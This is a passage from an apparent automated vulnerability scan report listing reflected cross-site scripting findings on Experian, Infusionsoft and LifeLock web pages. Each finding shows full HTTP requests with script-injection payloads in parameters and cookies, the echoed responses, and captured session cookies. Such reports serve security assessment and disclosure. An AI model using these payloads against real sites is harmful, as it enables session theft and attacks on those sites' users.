Cookie: ASPSESSIONIDSASDRQAB=CDHBNJACJBCIBIMLFEDPMNED; BIGipServerexperiandirect-web-pool=175394314.27679.0000; ASP.NET_SessionId=coygyj55nspn2hy5hekqo5bx; s_pers=%20s_lv%3D1303674402594%7C1398282402594%3B%20s_lv_s%3DFirst%2520Visit%7C1303676202594%3B%20sc_chstack%3D%255B%255B'Paid%252520Non-Search'%252C'1303674402602'%255D%255D%7C1461527202602%3B%20sc_cidstack%3D%255B%255B'668715'%252C'1303674402604'%255D%255D%7C1461527202604%3B%20sc_dl%3D1%7C1303676372831%3B%20gpv_p50%3Dhttp%253A%252F%252Fwww.experiandirect.com%252Ftriplealert%252Fdefault.aspx%253Fsc%253D668715%7C1303676372835%3B%20gpv_PN%3D100173%253Atriplealert%253Adefault.aspx%7C1303676372837%3B; s_sess=%20s_cc%3Dtrue%3B%20sc_cp_channel%3D1%3B%20sc_gvl_sc%3D668715%3B%20sc_gvl_bcd%3D0%3B%20c_m%3Dundefined668715undefined%3B%20ttc%3D1303674572839%3B%20SC_LINKS%3D100173%253Atriplealert%253Adefault.aspx%255E%255E%252FTRIPLEALERT%252FCobrand%252FImages%252FTripleAlert%252Fta_hp1_btn_ordernow_blue_on.gif%255E%255E100173%253Atriplealert%253Adefault.aspx%2520%257C%2520%252FTRIPLEALERT%252FCobrand%252FImages%252FTripleAlert%252Fta_hp1_btn_ordernow_blue_on.gif%255E%255E%3B%20s_sq%3Dexpiglobal%252Cexpitriplealertlive%253D%252526pid%25253D100173%2525253Atriplealert%2525253Adefault.aspx%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.experiandirect.com%2525252Ftriplealert%2525252FOrder1.aspx%2525253Fareaid%2525253D22%25252526pkgid%2525253DBCZ1Y%25252526SiteVersionID%2525253D473%25252526Sit_1%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B

Response

HTTP/1.1 302 Found
Date: Sun, 24 Apr 2011 20:19:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Location: https://www.experiandirect.com/triplealert/Order1.aspx?areaid=22&pkgid=BCZ1Y262ad'style='x:expression(alert(1))'b0fcf4c466a&SiteVersionID=473&SiteID=100173&sc=668715&bcd=
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 307

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href='https://www.experiandirect.com/triplealert/Order1.aspx?areaid=22&amp;pkgid=BCZ1Y262ad'style='x:expression(alert(1))'b0fcf4c466a&amp;SiteVersionID=473&amp;SiteID=100173&amp;sc=668715&amp;bcd='>
...[SNIP]...

6.460. http://www.experiandirect.com/triplealert/Order1.aspx [sc parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.experiandirect.com
Path:   /triplealert/Order1.aspx

Issue detail

The value of the sc request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 95e36'style%3d'x%3aexpression(alert(1))'3f61052112b was submitted in the sc parameter. This input was echoed as 95e36'style='x:expression(alert(1))'3f61052112b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /triplealert/Order1.aspx?areaid=22&pkgid=BCZ1Y&SiteVersionID=473&SiteID=100173&sc=66871595e36'style%3d'x%3aexpression(alert(1))'3f61052112b&bcd= HTTP/1.1
Host: www.experiandirect.com
Proxy-Connection: keep-alive
Referer: http://www.experiandirect.com/triplealert/default.aspx?sc=668715
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSASDRQAB=CDHBNJACJBCIBIMLFEDPMNED; BIGipServerexperiandirect-web-pool=175394314.27679.0000; ASP.NET_SessionId=coygyj55nspn2hy5hekqo5bx; s_pers=%20s_lv%3D1303674402594%7C1398282402594%3B%20s_lv_s%3DFirst%2520Visit%7C1303676202594%3B%20sc_chstack%3D%255B%255B'Paid%252520Non-Search'%252C'1303674402602'%255D%255D%7C1461527202602%3B%20sc_cidstack%3D%255B%255B'668715'%252C'1303674402604'%255D%255D%7C1461527202604%3B%20sc_dl%3D1%7C1303676372831%3B%20gpv_p50%3Dhttp%253A%252F%252Fwww.experiandirect.com%252Ftriplealert%252Fdefault.aspx%253Fsc%253D668715%7C1303676372835%3B%20gpv_PN%3D100173%253Atriplealert%253Adefault.aspx%7C1303676372837%3B; s_sess=%20s_cc%3Dtrue%3B%20sc_cp_channel%3D1%3B%20sc_gvl_sc%3D668715%3B%20sc_gvl_bcd%3D0%3B%20c_m%3Dundefined668715undefined%3B%20ttc%3D1303674572839%3B%20SC_LINKS%3D100173%253Atriplealert%253Adefault.aspx%255E%255E%252FTRIPLEALERT%252FCobrand%252FImages%252FTripleAlert%252Fta_hp1_btn_ordernow_blue_on.gif%255E%255E100173%253Atriplealert%253Adefault.aspx%2520%257C%2520%252FTRIPLEALERT%252FCobrand%252FImages%252FTripleAlert%252Fta_hp1_btn_ordernow_blue_on.gif%255E%255E%3B%20s_sq%3Dexpiglobal%252Cexpitriplealertlive%253D%252526pid%25253D100173%2525253Atriplealert%2525253Adefault.aspx%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.experiandirect.com%2525252Ftriplealert%2525252FOrder1.aspx%2525253Fareaid%2525253D22%25252526pkgid%2525253DBCZ1Y%25252526SiteVersionID%2525253D473%25252526Sit_1%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B

Response

HTTP/1.1 302 Found
Date: Sun, 24 Apr 2011 20:26:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Location: https://www.experiandirect.com/triplealert/Order1.aspx?areaid=22&pkgid=BCZ1Y&SiteVersionID=473&SiteID=100173&sc=66871595e36'style='x:expression(alert(1))'3f61052112b&bcd=
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 307

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href='https://www.experiandirect.com/triplealert/Order1.aspx?areaid=22&amp;pkgid=BCZ1Y&amp;SiteVersionID=473&amp;SiteID=100173&amp;sc=66871595e36'style='x:expression(alert(1))'3f61052112b&amp;bcd='>
...[SNIP]...

6.461. http://www.infusionsoft.com/demo [LeadSource cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.infusionsoft.com
Path:   /demo

Issue detail

The value of the LeadSource cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d88a6'style%3d'x%3aexpression(alert(1))'e63acb34ef4 was submitted in the LeadSource cookie. This input was echoed as d88a6'style='x:expression(alert(1))'e63acb34ef4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /demo HTTP/1.1
Host: www.infusionsoft.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS9dd4d016da30aa43b8e02b23417e983e=8cabe0c3be364f38f383997676b59504; LeadSource=www.infusionsoft.comd88a6'style%3d'x%3aexpression(alert(1))'e63acb34ef4; __utmz=84293057.1303693620.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=84293057.878895164.1303693620.1303693620.1303693620.1; __utmc=84293057; __utmv=84293057.|1=funnelSrc=ms=1,; __utmb=84293057.1.10.1303693620; __v1192_=46276302; __v1192_nFactors=1; __v1192_recipeID=68334; 46276302_campaignID=2630; Type=%28none%29; ISFunnel=ms; __v1192_vexclude=false

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 01:38:18 GMT
Server: Apache/2.2.14 (Ubuntu)
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 01:38:18 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Set-Cookie: Referer=deleted; expires=Sun, 25-Apr-2010 01:38:17 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: Type=%28none%29; expires=Wed, 25-Jun-2014 11:24:58 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: visits=deleted; expires=Sun, 25-Apr-2010 01:38:17 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: Referer=deleted; expires=Sun, 25-Apr-2010 01:38:17 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: Referer=deleted; expires=Sun, 25-Apr-2010 01:38:17 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: ISFunnel=ms; expires=Tue, 26-Apr-2011 01:38:18 GMT; path=/; domain=.infusionsoft.com
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 42476


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir=
...[SNIP]...
<input type='hidden' name='LeadSource' id='Leadsource' value='www.infusionsoft.comd88a6'style='x:expression(alert(1))'e63acb34ef4' />
...[SNIP]...

6.462. http://www.lifelock.com/about/leadership/management/ [LifeLockEnrollment cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lifelock.com
Path:   /about/leadership/management/

Issue detail

The value of the LifeLockEnrollment cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c606"><script>alert(1)</script>44823d22b35 was submitted in the LifeLockEnrollment cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /about/leadership/management/ HTTP/1.1
Host: www.lifelock.com
Proxy-Connection: keep-alive
Referer: http://www.lifelock.com/about/lifelock-in-the-community/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerpool_www.lifelock.com=319031818.20480.0000; __utmz=182152376.1303613800.1.1.utmgclid=CNG9kumTtKgCFUNd5Qod6WW7Cw|utmccn=(not%20set)|utmcmd=(not%20set); LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; 480-PV=3114#4/24/2011/2/56/45; C3UID=13014572191303613803; TSceba2f=4c2e4748e3ad874fb118367baa2b31383ec073d706939dfc4db3942d; __utma=182152376.1080477552.1303613800.1303613800.1303613800.1; __utmc=182152376; __utmb=182152376.3.10.1303613800; LifeLockEnrollment=promoCode=GOOGSEARCH131c606"><script>alert(1)</script>44823d22b35; LIFELOCK_SESSION=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99%3DSun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_22; 480-CT=3114#4/24/2011/2/56/45|1#4/24/2011/3/8/36

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:23:06 GMT
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Set-Cookie: TSceba2f=e26e4dc493f4a4caf15b4aaabe78cd2f3ec073d706939dfc4db3979a; Path=/
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 18362

<!doctype HTML>
<!--[if lt IE 7 ]> <html lang="en" class="no-js ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="no-js ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="no-js ie8">
...[SNIP]...
<a href="https://secure.lifelock.com/enrollment?promocode=googsearch131c606"><script>alert(1)</script>44823d22b35" class="enroll-now">
...[SNIP]...

6.463. http://www.lifelock.com/about/lifelock-in-the-community/ [LifeLockEnrollment cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lifelock.com
Path:   /about/lifelock-in-the-community/

Issue detail

The value of the LifeLockEnrollment cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19f44"><script>alert(1)</script>cf60dea9c5 was submitted in the LifeLockEnrollment cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /about/lifelock-in-the-community/ HTTP/1.1
Host: www.lifelock.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerpool_www.lifelock.com=319031818.20480.0000; __utmz=182152376.1303613800.1.1.utmgclid=CNG9kumTtKgCFUNd5Qod6WW7Cw|utmccn=(not%20set)|utmcmd=(not%20set); LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; 480-PV=3114#4/24/2011/2/56/45; C3UID=13014572191303613803; TSceba2f=3e9d64599ec3dc11eab7f4125fe101c63ec073d706939dfc4db392a6; __utma=182152376.1080477552.1303613800.1303613800.1303613800.1; __utmc=182152376; __utmb=182152376.2.10.1303613800; LifeLockEnrollment=promoCode=GOOGSEARCH1319f44"><script>alert(1)</script>cf60dea9c5; LIFELOCK_SESSION=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99%3DSun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_22; 480-CT=3114#4/24/2011/2/56/45|1#4/24/2011/3/2/9

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:22:59 GMT
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Set-Cookie: TSceba2f=bbb4c353da958a49066e32345fe550473ec073d706939dfc4db39793; Path=/
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 16031

<!doctype HTML>
<!--[if lt IE 7 ]> <html lang="en" class="no-js ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="no-js ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="no-js ie8">
...[SNIP]...
<a href="https://secure.lifelock.com/enrollment?promocode=googsearch1319f44"><script>alert(1)</script>cf60dea9c5" class="enroll-now">
...[SNIP]...

6.464. http://www.lifelock.com/guarantee/ [LifeLockEnrollment cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lifelock.com
Path:   /guarantee/

Issue detail

The value of the LifeLockEnrollment cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94aa7"><script>alert(1)</script>167524f77ad was submitted in the LifeLockEnrollment cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /guarantee/ HTTP/1.1
Host: www.lifelock.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerpool_www.lifelock.com=319031818.20480.0000; __utmz=182152376.1303613800.1.1.utmgclid=CNG9kumTtKgCFUNd5Qod6WW7Cw|utmccn=(not%20set)|utmcmd=(not%20set); LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; 480-PV=3114#4/24/2011/2/56/45; C3UID=13014572191303613803; TSceba2f=4c2e4748e3ad874fb118367baa2b31383ec073d706939dfc4db3942d; LifeLockEnrollment=promoCode=GOOGSEARCH1394aa7"><script>alert(1)</script>167524f77ad; LIFELOCK_SESSION=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99%3DSun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_22; __utma=182152376.1080477552.1303613800.1303613800.1303613800.1; __utmc=182152376; __utmb=182152376.6.10.1303613800; 480-CT=3114#4/24/2011/2/56/45|1#4/24/2011/3/8/54

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:21:36 GMT
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Set-Cookie: TSceba2f=66a7695384996248881c6a8ba7494b0a3ec073d706939dfc4db39740; Path=/
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 13412

<!doctype HTML>
<!--[if lt IE 7 ]> <html lang="en" class="no-js ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="no-js ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="no-js ie8">
...[SNIP]...
<a href="https://secure.lifelock.com/enrollment?promocode=googsearch1394aa7"><script>alert(1)</script>167524f77ad" class="enroll-now">
...[SNIP]...

6.465. http://www.lifelock.com/how-it-works/ [LifeLockEnrollment cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lifelock.com
Path:   /how-it-works/

Issue detail

The value of the LifeLockEnrollment cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3bdd"><script>alert(1)</script>b0ca6746d39 was submitted in the LifeLockEnrollment cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /how-it-works/ HTTP/1.1
Host: www.lifelock.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerpool_www.lifelock.com=319031818.20480.0000; __utmz=182152376.1303613800.1.1.utmgclid=CNG9kumTtKgCFUNd5Qod6WW7Cw|utmccn=(not%20set)|utmcmd=(not%20set); LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; 480-PV=3114#4/24/2011/2/56/45; C3UID=13014572191303613803; TSceba2f=4c2e4748e3ad874fb118367baa2b31383ec073d706939dfc4db3942d; __utma=182152376.1080477552.1303613800.1303613800.1303613800.1; __utmc=182152376; __utmb=182152376.4.10.1303613800; LifeLockEnrollment=promoCode=GOOGSEARCH13e3bdd"><script>alert(1)</script>b0ca6746d39; LIFELOCK_SESSION=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99%3DSun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_22; 480-CT=3114#4/24/2011/2/56/45|1#4/24/2011/3/8/45

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:23:37 GMT
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Set-Cookie: TSceba2f=4e6b2ce904419aa4e205c488d5ec5cb83ec073d706939dfc4db397b9; Path=/
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 12713

<!doctype HTML>
<!--[if lt IE 7 ]> <html lang="en" class="no-js ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="no-js ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="no-js ie8">
...[SNIP]...
<a href="https://secure.lifelock.com/enrollment?promocode=googsearch13e3bdd"><script>alert(1)</script>b0ca6746d39" class="enroll-now">
...[SNIP]...

6.466. http://www.lifelock.com/identity-theft/ [LifeLockEnrollment cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lifelock.com
Path:   /identity-theft/

Issue detail

The value of the LifeLockEnrollment cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58800"><script>alert(1)</script>8aee1f6f841 was submitted in the LifeLockEnrollment cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /identity-theft/ HTTP/1.1
Host: www.lifelock.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerpool_www.lifelock.com=319031818.20480.0000; __utmz=182152376.1303613800.1.1.utmgclid=CNG9kumTtKgCFUNd5Qod6WW7Cw|utmccn=(not%20set)|utmcmd=(not%20set); LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; 480-PV=3114#4/24/2011/2/56/45; C3UID=13014572191303613803; TSceba2f=4c2e4748e3ad874fb118367baa2b31383ec073d706939dfc4db3942d; __utma=182152376.1080477552.1303613800.1303613800.1303613800.1; __utmc=182152376; __utmb=182152376.4.10.1303613800; LifeLockEnrollment=promoCode=GOOGSEARCH1358800"><script>alert(1)</script>8aee1f6f841; LIFELOCK_SESSION=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99%3DSun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_22; 480-CT=3114#4/24/2011/2/56/45|1#4/24/2011/3/8/45

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:23:45 GMT
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Set-Cookie: TSceba2f=bc5461a6bc59c952ded36dc474d908a43ec073d706939dfc4db397c1; Path=/
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 32728

<!doctype HTML>
<!--[if lt IE 7 ]> <html lang="en" class="no-js ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="no-js ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="no-js ie8">
...[SNIP]...
<a href="https://secure.lifelock.com/enrollment?promocode=googsearch1358800"><script>alert(1)</script>8aee1f6f841" class="enroll-now">
...[SNIP]...

6.467. http://www.lifelock.com/lifelock-for-people [LifeLockEnrollment cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lifelock.com
Path:   /lifelock-for-people

Issue detail

The value of the LifeLockEnrollment cookie is copied into the HTML document as plain text between tags. The payload 3ed6d<script>alert(1)</script>ffa9f133cf0 was submitted in the LifeLockEnrollment cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /lifelock-for-people HTTP/1.1
Host: www.lifelock.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; 480-PV=3114#4/24/2011/2/56/45; C3UID=13014572191303613803; __utmz=182152376.1303660958.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; BIGipServerpool_www.lifelock.com=319031818.20480.0000; TSceba2f=d03f174909aa821fd06beafbefcefa10f2f0945343012f3c4db449cd; __utma=182152376.1080477552.1303613800.1303647989.1303660958.3; __utmc=182152376; LifeLockEnrollment=promoCodeHide=ADCONIONRT7e556"><script>alert(document.cookie)</script>7f71559fd293ed6d<script>alert(1)</script>ffa9f133cf0; LIFELOCK_SESSION=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99%3DSun%2C%2024%20Apr%202011%2016%3A02%3A38%20GMT_20; 480-CT=adcon#4/24/2011/16/3/28|1#4/24/2011/16/4/11; 480-ST=1~promocodehide=ADCONIONRT7e556"><script>alert(document.cookie)</script>7f71559fd29~4/24/2011/16/4/11|1~promocodehide=ADCONIONRT7e556"><script>alert(document.cookie)</script>7f71559fd29~4/24/2011/16/4/11

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:52:05 GMT
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Set-Cookie: TSceba2f=953375b4763ac3ef061aea5f42ceb1cdf2f0945343012f3c4db45535; Path=/
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 13558

<!doctype HTML>
<!--[if lt IE 7 ]> <html lang="en" class="no-js ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="no-js ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="no-js ie8">
...[SNIP]...
</script>7f71559fd293ed6d<script>alert(1)</script>ffa9f133cf0" class="enroll-now">
...[SNIP]...

6.468. http://www.lifelock.com/lifelock-for-people [LifeLockEnrollment cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lifelock.com
Path:   /lifelock-for-people

Issue detail

The value of the LifeLockEnrollment cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 621fd"><script>alert(1)</script>1b53291154 was submitted in the LifeLockEnrollment cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /lifelock-for-people HTTP/1.1
Host: www.lifelock.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
